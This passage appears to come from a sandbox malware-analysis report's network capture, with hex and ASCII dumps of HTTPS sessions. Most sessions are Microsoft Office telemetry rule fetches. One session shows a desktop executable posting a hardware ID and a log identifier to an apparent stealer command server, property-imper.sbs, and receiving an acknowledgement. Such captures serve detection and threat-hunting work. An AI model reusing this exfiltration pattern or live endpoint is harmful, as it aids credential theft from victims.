                                                                                                                                                                        Data Ascii: WMvLAIf70dcLeGWe/kj3OfbJQ0+zP1mpcJKT1jL5ipbeChKfA36Q1U68JA5nnuW74t6I3GFtD2ylB8MEcvddVs4OEBnbaoaC2/5z235e9ywyTN0bIWiPfPXVU1ZiM9nXF5WNSY1/1pKA9iGbrRri/nXaDdwy/1r9JoHUB/T4CRTIFdcfCC5FRsI5Y96vnuNpbxnOXjS6z36lEEfB9uXJB9xKEpsaqIYCGq202v3dNz+2yVmMIXoPeyUAFxNmd9n
                                                                                                                                                                        2024-11-24 04:11:22 UTC1369INData Raw: 32 36 65 32 0d 0a 66 47 56 56 6c 63 6e 64 6f 6a 4a 56 35 72 42 44 45 33 38 6b 78 6c 41 38 69 4d 64 62 70 6a 33 74 6d 4e 63 43 52 39 77 50 31 44 69 74 70 41 53 31 69 46 33 32 52 62 4c 69 67 64 66 47 44 41 44 52 4e 39 32 63 38 30 6f 53 33 45 71 4b 35 2b 4f 6e 44 43 37 47 7a 35 39 31 46 53 55 49 44 59 4a 46 55 67 62 6c 4a 6b 61 4c 63 4e 58 79 79 6d 32 53 54 72 4e 73 6d 37 7a 43 31 6d 59 59 76 6a 50 61 4b 55 48 77 30 52 79 38 73 6b 51 79 41 76 48 44 45 35 2b 6b 4e 59 4c 2f 53 48 64 36 39 75 32 39 61 6c 58 44 6c 31 79 66 64 79 76 2b 70 35 66 6c 4b 41 31 57 6b 55 61 31 59 73 4b 54 76 33 51 31 77 72 39 38 45 36 2b 57 4c 63 73 4b 49 39 66 44 37 36 74 44 32 73 6c 42 38 66 61 6f 6a 58 61 68 78 32 65 56 38 64 4e 66 4a 42 56 6a 4c 74 77 54 72 35 61 39 79 77 79 7a 4e
                                                                                                                                                                        Data Ascii: 26e2fGVVlcndojJV5rBDE38kxlA8iMdbpj3tmNcCR9wP1DitpAS1iF32RbLigdfGDADRN92c80oS3EqK5+OnDC7Gz591FSUIDYJFUgblJkaLcNXyym2STrNsm7zC1mYYvjPaKUHw0Ry8skQyAvHDE5+kNYL/SHd69u29alXDl1yfdyv+p5flKA1WkUa1YsKTv3Q1wr98E6+WLcsKI9fD76tD2slB8faojXahx2eV8dNfJBVjLtwTr5a9ywyzN
                                                                                                                                                                        2024-11-24 04:11:22 UTC1369INData Raw: 32 71 33 78 45 46 63 59 62 58 79 61 42 31 6e 63 68 55 36 48 74 6b 4e 46 58 33 70 77 53 79 41 4c 64 53 6f 70 44 4e 30 5a 6f 57 69 50 59 48 58 53 56 46 59 6e 63 67 70 50 6e 64 72 41 6a 6f 37 75 51 4d 62 4f 36 62 5a 4a 50 63 74 6d 50 6e 62 4a 57 51 73 6e 71 38 75 34 34 51 56 51 42 47 53 6d 58 4a 62 4f 44 70 63 66 43 71 35 46 52 74 36 35 5a 4e 6d 76 32 36 4b 36 39 78 44 43 6c 6a 47 36 33 65 56 32 56 64 59 59 62 58 4d 5a 78 56 75 62 77 51 74 65 4c 63 4e 56 48 32 2b 75 44 54 78 49 5a 72 72 6a 54 30 4c 4d 49 58 69 50 65 79 55 63 6c 78 52 68 64 35 79 43 69 31 4f 45 53 30 79 32 45 42 4c 4f 71 62 50 4e 4c 38 74 78 4c 76 56 50 54 42 76 68 61 49 74 35 6f 38 53 44 41 6a 62 69 33 74 56 65 53 67 45 66 47 43 72 41 78 73 76 70 74 6b 30 2f 6d 36 4f 2b 70 31 2b 49 6e 32 43
                                                                                                                                                                        Data Ascii: 2q3xEFcYbXyaB1nchU6HtkNFX3pwSyALdSopDN0ZoWiPYHXSVFYncgpPndrAjo7uQMbO6bZJPctmPnbJWQsnq8u44QVQBGSmXJbODpcfCq5FRt65ZNmv26K69xDCljG63eV2VdYYbXMZxVubwQteLcNVH2+uDTxIZrrjT0LMIXiPeyUclxRhd5yCi1OES0y2EBLOqbPNL8txLvVPTBvhaIt5o8SDAjbi3tVeSgEfGCrAxsvptk0/m6O+p1+In2C


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        3192.168.2.74970613.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:23 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:23 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 450
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                        x-ms-request-id: ac6669be-e01e-003c-668c-3ac70b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041123Z-174c587ffdf89smkhC1TEB697s000000040g0000000084w0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:24 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        4192.168.2.74971013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:23 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:23 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 408
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                        x-ms-request-id: 4a9b7938-301e-000c-7880-3d323f000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041123Z-174c587ffdftv9hphC1TEBm29w00000003u000000000dvbp
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:24 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        5192.168.2.74970913.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:23 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:24 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 2160
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                        x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041124Z-178bfbc474b9fdhphC1NYCac0n00000005cg000000007p5k
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:24 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        6192.168.2.74970713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:23 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:24 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:24 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 2980
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                        x-ms-request-id: d279acb6-501e-0029-6110-3dd0b8000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041124Z-178bfbc474bp8mkvhC1NYCzqnn00000005bg000000003sy9
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:24 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        7192.168.2.74970813.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:23 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:24 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 3788
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                        x-ms-request-id: 5299024a-c01e-0079-4d47-3ce51a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041124Z-174c587ffdf89smkhC1TEB697s000000041g000000004zk0
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:24 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.749711104.21.33.1164437416C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:24 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=JVYRDEMAH
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 12796
                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                        2024-11-24 04:11:24 UTC12796OUTData Raw: 2d 2d 4a 56 59 52 44 45 4d 41 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 41 46 45 44 38 41 38 43 46 38 42 41 44 34 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4a 56 59 52 44 45 4d 41 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 56 59 52 44 45 4d 41 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4a 56 59 52 44 45 4d 41 48 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                        Data Ascii: --JVYRDEMAHContent-Disposition: form-data; name="hwid"95AFED8A8CF8BAD4D7CBBD6DF28D3732--JVYRDEMAHContent-Disposition: form-data; name="pid"2--JVYRDEMAHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--JVYRDEMAHConten
                                                                                                                                                                        2024-11-24 04:11:24 UTC1020INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:24 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=34qgbnijafb45qf96uqt0jg3v0; expires=Wed, 19-Mar-2025 21:58:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=soyI6m0vzcri%2BSDc7Enn2GKGmxNHb2QPftgrYhY4QveJVLXgXQPBEG2usPfD8gcBI%2Bceh3ITznOB64ExIUMW3g%2FHeILBfq5AgLxGMxsjPVC%2BHtqC49Q8BHY%2B7qGm36fgHUTDxLE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e768e043d7c4271-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1586&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13729&delivery_rate=1765417&cwnd=252&unsent_bytes=0&cid=f96c5c85d49d5734&ts=799&x=0"
                                                                                                                                                                        2024-11-24 04:11:24 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                        2024-11-24 04:11:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        9192.168.2.74971213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:25 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:26 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                        ETag: "0x8DC582B9964B277"
                                                                                                                                                                        x-ms-request-id: 4712fcc8-d01e-002b-279a-3b25fb000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041126Z-174c587ffdfx984chC1TEB676g00000003ug00000000hyyv
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:26 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        10192.168.2.74971313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:25 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:26 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                        x-ms-request-id: 30601852-401e-0047-7476-3b8597000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041126Z-174c587ffdf8fcgwhC1TEBnn7000000004300000000085p3
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:26 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        11192.168.2.74971513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:25 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
